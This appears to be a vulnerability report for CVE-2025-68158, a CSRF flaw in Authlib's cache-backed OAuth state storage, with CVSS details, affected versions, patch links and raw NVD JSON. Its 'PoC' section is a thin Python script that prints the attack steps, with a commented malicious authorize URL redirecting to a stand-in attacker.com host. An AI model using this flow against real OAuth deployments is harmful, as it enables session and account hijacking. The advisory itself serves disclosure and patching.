Security Vulnerability Report
CVE-2025-68158 CVSS 5.7 MEDIUM

CVE-2025-68158

Published: 2026-01-08 18:15:59
Last Modified: 2026-03-30 13:16:22

Description

Authlib is a Python library which builds OAuth and OpenID Connect servers. In versions 1.0.0 through 1.6.5, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under _state_{app}_{state}, and get_state_data ignores the caller’s session altogether. This issue has been patched in version 1.6.6.

CVSS Details

CVSS Score: 5.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
Weakness: CWE-352 (Cross-Site Request Forgery)

The score above is the Secondary (vendor-supplied) metric in the NVD record. The NVD Primary metric for this CVE rates it 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H); both metrics appear in the raw JSON data at the end of this report.

Configurations (Affected Products)

cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:* - VULNERABLE
Authlib < 1.0.0 (not affected)
Authlib 1.0.0 - 1.6.5 (affected)
Authlib >= 1.6.6 (fixed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import time


def generate_csrf_payload(attacker_state, target_redirect_uri):
    """
    CVE-2025-68158 CSRF PoC
    Generate malicious OAuth state for CSRF attack

    Args:
        attacker_state: Valid state from attacker's own OAuth flow
        target_redirect_uri: Target application's OAuth callback URL

    Returns:
        Malicious redirect URL with CSRF payload
    """
    # Attack scenario: Attacker initiates OAuth flow, gets valid state
    # Then tricks victim into completing auth with same state
    # Finally attacker uses the state to hijack victim's session
    payload = {
        'attacker_state': attacker_state,
        'target_redirect': target_redirect_uri,
        'timestamp': int(time.time()),
    }
    # In real attack, the malicious URL would be:
    # https://target-oauth-server/authorize?
    #   client_id=attacker_app&
    #   redirect_uri=https://attacker.com/callback&
    #   scope=openid profile email&
    #   state={attacker_state}&
    #   response_type=code
    malicious_url = f"{target_redirect_uri}?state={attacker_state}"
    return malicious_url, payload


def exploit_vulnerability(attacker_oauth_flow_url):
    """
    Exploit Authlib CSRF vulnerability

    Steps:
    1. Attacker initiates OAuth flow to obtain valid state
    2. Attacker crafts malicious link for victim
    3. Victim clicks link and completes authentication
    4. Attacker uses captured state to hijack session
    """
    print("[*] CVE-2025-68158 Authlib CSRF Exploit")
    print("[*] Step 1: Initiate OAuth flow to get valid state")
    print(f"[*] URL: {attacker_oauth_flow_url}")
    # In vulnerable version, state is stored as: _state_{app}_{state}
    # without session binding
    cache_key_pattern = "_state_{app}_{state}"
    print(f"[*] Vulnerable cache key pattern: {cache_key_pattern}")
    print("[*] State is NOT bound to user session!")
    return True
```

References

https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489 (Patch)
https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228 (Patch)
https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523 (Vendor Advisory, Exploit)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-68158",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T18:15:59.060",
    "lastModified": "2026-03-30T13:16:21.587",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. In versions 1.0.0 through 1.6.5, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under _state_{app}_{state}, and get_state_data ignores the caller’s session altogether. This issue has been patched in version 1.6.6."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 5.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-352"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.6.6",
                "matchCriteriaId": "7E0D5D7A-D21C-445C-83BA-4DD3C66C5A0E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```